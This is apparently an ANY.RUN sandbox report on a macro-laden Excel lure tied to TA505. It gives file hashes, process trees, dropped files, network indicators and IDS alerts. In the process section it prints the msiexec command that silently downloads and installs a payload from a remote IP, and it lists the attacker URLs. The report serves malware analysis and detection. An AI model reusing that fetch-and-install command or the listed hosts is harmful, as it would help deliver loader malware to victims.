analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

20180423 출납일보.xls

Full analysis: https://app.any.run/tasks/93979ff8-aff7-44b0-90b7-64ace04b5f41
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: April 23, 2019, 22:34:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
exe-to-msi
loader
ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Tue Apr 23 18:44:49 2019, Security: 0
MD5:

8ACF6C9298C8D9553A9F320AEB24D9C7

SHA1:

32D1EF20E74309A1E31A63E5B63DECECC33BC04C

SHA256:

E82DB6A27D20F09E3023FE4D2D4A5F1BA0C2CDE7E88BCFB158244919E805E0ED

SSDEEP:

3072:uKpb8rGYrMPelwhKmFV5xtezEsgrdgncwPWsqPJjRpQAJr9FuPY9BF:uKpb8rGYrMPelwhKmFV5xtuEsgrdgn6/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 1360)

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 1360)

    • Downloads executable files from IP

      • msiexec.exe (PID: 1488)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 1488)

    • Loads the Task Scheduler DLL interface

      • MSI7175.tmp (PID: 3564)

    • Loads the Task Scheduler COM API

      • MSI7175.tmp (PID: 3564)

    • Changes the autorun value in the registry

      • MSI7175.tmp (PID: 3564)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 1488)
      • MSI7175.tmp (PID: 3564)

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 1488)

    • Creates files in the program directory

      • MSI7175.tmp (PID: 3564)

    • Creates files in the Windows directory

      • MSI7175.tmp (PID: 3564)

    • Starts CMD.EXE for commands execution

      • MSI7175.tmp (PID: 3564)

  • INFO

    • Starts application with an unusual extension

      • msiexec.exe (PID: 1488)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 1488)

    • Application was dropped or rewritten from another process

      • MSI7175.tmp (PID: 3564)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 1360)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: Microsoft Office
LastModifiedBy: 1
Software: Microsoft Excel
CreateDate: 2018:12:19 10:42:12
ModifyDate: 2019:04:23 17:44:49
Security: None
CodePage: Windows Cyrillic
Company: Microsoft Corporation
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • 4
  • OOOO
  • 2
  • 3
HeadingPairs:
  • Листы
  • 2
  • Макросы Excel 4.0
  • 2
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
5
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msi7175.tmp cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1360"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
596msiexec.exe STOP=1 /i http://27.102.118.143/dom1 /q ksw='%TEMP%' C:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1488C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3564"C:\Windows\Installer\MSI7175.tmp"C:\Windows\Installer\MSI7175.tmp
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3616"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSI7175.tmp >> NULC:\Windows\system32\cmd.exeMSI7175.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
6 721
Read events
6 625
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
6
Text files
9
Unknown types
3

Dropped files

PID
Process
Filename
Type
1360EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR5C16.tmp.cvr
MD5:
SHA256:
1488msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF0915C90E95DAFFC5.TMP
MD5:
SHA256:
1488msiexec.exeC:\Config.Msi\e6fde.rbs
MD5:
SHA256:
1488msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF3F2EFF3B71DE26F9.TMP
MD5:
SHA256:
1360EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\query[1].asmx
MD5:
SHA256:
3564MSI7175.tmpC:\ProgramData\Microsofts HeIp\wsus.exeexecutable
MD5:344D62CDE7BB83D5C12377BA8608D9A6
SHA256:1940A581E3D54481D4D45AD45AB92E713F8A6291DCD582AD1D382D6DE9967FE8
1488msiexec.exeC:\Windows\Installer\e6fdd.ipibinary
MD5:06C46E5F06D9B149FC91D56C38984EAC
SHA256:2F54C2627981D1DD032F676EC148E0F8308B988CFBA93B0E142D5F77A160BC14
1488msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:7269B25FE8F6FDBF029742B41E422D2E
SHA256:2385A4A9A0340CCA5226D5EE68EC4F6D6C4AA593613FA59E4BD78AD7E10465E8
1488msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\5V36IRNN\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
1488msiexec.exeC:\Windows\Installer\MSI6ADB.tmpexecutable
MD5:15524A83BFD4D2FDEE1239CC63113850
SHA256:50F300BF2E87A2063EEE32867B1D7F41F55F67CEC0B2F26D2D6766DCF7C459A6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
4
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3564
MSI7175.tmp
GET
160.202.162.147:80
http://160.202.162.147/1.tmp
KR
suspicious
1488
msiexec.exe
GET
200
27.102.118.143:80
http://27.102.118.143/dom1
KR
executable
156 Kb
suspicious
GET
200
52.109.76.6:80
http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={538F6C89-2AD5-4006-8154-C6670774E980}&build=14.0.6023
IE
xml
1.99 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3564
MSI7175.tmp
160.202.162.147:80
Korea Telecom
KR
suspicious
52.109.120.29:443
rr.office.microsoft.com
Microsoft Corporation
HK
whitelisted
52.109.76.6:80
office14client.microsoft.com
Microsoft Corporation
IE
whitelisted
1488
msiexec.exe
27.102.118.143:80
DAOU TECHNOLOGY
KR
suspicious

DNS requests

Domain
IP
Reputation
office14client.microsoft.com
  • 52.109.76.6
whitelisted
rr.office.microsoft.com
  • 52.109.120.29
whitelisted

Threats

PID
Process
Class
Message
1488
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
1488
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3564
MSI7175.tmp
A Network Trojan was detected
ET CURRENT_EVENTS MalDoc Request for Payload (TA505 Related)
1 ETPRO signatures available at the full report
Process
Message
MSI7175.tmp
C:\ProgramData\Microsofts HeIp\template_d9b318.DATAHASH
MSI7175.tmp
1
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
20180423 출납일보.xls